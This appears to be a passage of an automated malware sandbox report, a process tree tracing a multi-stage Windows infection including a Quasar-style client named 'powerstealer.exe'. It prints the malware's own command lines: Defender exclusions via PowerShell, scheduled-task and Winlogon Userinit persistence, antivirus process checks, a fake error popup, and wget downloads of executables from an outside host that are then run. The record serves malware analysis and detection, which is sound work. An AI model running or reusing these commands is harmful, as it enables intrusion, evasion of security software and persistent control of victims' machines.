- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"3⤵
- Executes dropped EXE
PID:5264 -
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5DfyDGt6tFbu.bat" "5⤵PID:5468
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5576
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5672
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYVpbnKTyFJB.bat" "7⤵PID:404
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5192
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2304
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9fN19X1gdKqt.bat" "9⤵PID:5696
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5780
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5144
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pXYMY3FHGUVD.bat" "11⤵PID:5728
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:2572
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5344
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q6tFsoQwaise.bat" "13⤵PID:5476
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:5304
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1980
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4340 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KdgBxwpbp71m.bat" "15⤵PID:5448
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:6020
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5428
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vVPXKzAJYeqh.bat" "17⤵PID:2940
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:6020
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5740
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"18⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5oWURHRGPyqc.bat" "19⤵PID:4012
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:4848
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1624
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"20⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:1576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JV4OXg33Le1v.bat" "21⤵PID:5908
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:2180
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5028
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"22⤵
- Suspicious use of SendNotifyMessage
PID:2000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZvGCTHhM54ev.bat" "23⤵PID:2344
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:3084
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6100
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"24⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:4864 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3PPMBYtZpstv.bat" "25⤵PID:6436
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:6524
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6552
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"26⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:7152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ePYQs2RXteoA.bat" "27⤵PID:1248
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:5132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4856
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"28⤵
- Suspicious use of SendNotifyMessage
PID:4848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fsu2K5sJahkY.bat" "29⤵PID:5376
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:5856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1612
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"30⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j9U8XDgHRsVt.bat" "31⤵PID:6824
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:4016
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3224
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"32⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:2720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TrkacFT5zM1s.bat" "33⤵PID:6092
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:4480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6012
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"34⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kS6NiRqG61Pg.bat" "35⤵PID:6228
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:6112
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6264
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"36⤵
- Checks computer location settings
PID:6720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ANIGKu5nr99W.bat" "37⤵PID:6044
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:1352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7088
-
-
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"38⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LiVOQUmNyapN.bat" "39⤵PID:5280
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:1992
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6028
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"3⤵
- Executes dropped EXE
PID:5140 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1456
-
-
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5524 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ardara.exe"C:\Users\Admin\AppData\Local\Temp\Files\ardara.exe"3⤵
- Executes dropped EXE
PID:5428 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5292
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit4⤵
- System Location Discovery: System Language Discovery
PID:2000 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5556
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5124
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5792
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5436485⤵
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BiddingVeRoutinesFilms" Bowling5⤵
- System Location Discovery: System Language Discovery
PID:5844
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E5⤵
- System Location Discovery: System Language Discovery
PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\543648\Legend.pifLegend.pif E5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5848 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
PID:6080 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6088
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe6⤵
- Executes dropped EXE
PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1172
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\anticheat.exe"C:\Users\Admin\AppData\Local\Temp\Files\anticheat.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5452 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F6A.tmp\6F6B.tmp\6F6C.bat C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"4⤵PID:5264
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
PID:1840
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:760
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5932
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5568
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1900
-
-
C:\Users\Admin\AppData\Roaming\run.exerun.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3496 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BEA3.tmp\BEA4.tmp\BEA5.bat C:\Users\Admin\AppData\Roaming\run.exe"6⤵PID:2304
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5168
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2036
-
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:920
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"7⤵
- Views/modifies file attributes
PID:5392
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"7⤵
- Views/modifies file attributes
PID:5460
-
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:5332
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F7⤵PID:1576
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F7⤵PID:6096
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F7⤵PID:6104
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Fix Getting Devices" /F7⤵PID:6132
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Windows Optimize" /F7⤵PID:5124
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "ChangeWallpaper" /F7⤵PID:5888
-
-
-
-
C:\Users\Admin\AppData\Roaming\run2.exerun2.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1236 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C181.tmp\C192.tmp\C193.bat C:\Users\Admin\AppData\Roaming\run2.exe"6⤵
- Drops file in System32 directory
PID:5932 -
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:5620
-
-
C:\Users\Admin\AppData\Roaming\wallx.exewallx.exe7⤵
- Checks computer location settings
- Executes dropped EXE
PID:5132 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCCC.tmp\CCCD.tmp\CCCE.bat C:\Users\Admin\AppData\Roaming\wallx.exe"8⤵PID:6116
-
C:\Users\Admin\AppData\Roaming\WallpaperX.exeWallpaperX.exe9⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:5888
-
-
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:1900
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Drops file in System32 directory
PID:6140
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:5396
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\windows\system32\userinit.exe"7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5784
-
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\userinit.exe" /grant administrators:F7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4864
-
-
C:\FixCSM.exeC:\FixCSM.exe7⤵
- Executes dropped EXE
PID:5380 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1E76.tmp\1E77.tmp\1E78.bat C:\FixCSM.exe"8⤵PID:5576
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f9⤵
- Modifies WinLogon for persistence
PID:5864
-
-
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 107⤵
- Delays execution with timeout.exe
PID:6016
-
-
C:\Windows\System32\del.exeC:\Windows\System32\del.exe7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3848 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4576.tmp\4577.tmp\4578.bat C:\Windows\System32\del.exe"8⤵PID:6104
-
C:\Windows\system32\timeout.exeTIMEOUT /T 59⤵
- Delays execution with timeout.exe
PID:1956
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"7⤵
- Views/modifies file attributes
PID:4428
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"7⤵
- Views/modifies file attributes
PID:3412
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe"C:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe"3⤵
- Executes dropped EXE
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\onefile_2592_133850880017347246\stub.exeC:\Users\Admin\AppData\Local\Temp\Files\roblox1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1468 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:1716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:2940
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:5236
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:1108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:4444 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"6⤵
- Views/modifies file attributes
PID:5276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""5⤵PID:3492
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"6⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"5⤵PID:6016
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe6⤵
- Kills process with taskkill
PID:3952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"3⤵
- Executes dropped EXE
PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
PID:1496 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5784
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:5352 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rmBHFBNgjT56.bat" "5⤵PID:3296
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:4428
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2444
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5352 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:5652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FcqNJ8Aais52.bat" "7⤵PID:3200
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6052
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1980
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"8⤵
- Checks computer location settings
PID:3016 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:5416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIT3uuQcQ0GH.bat" "9⤵PID:5440
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5332
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
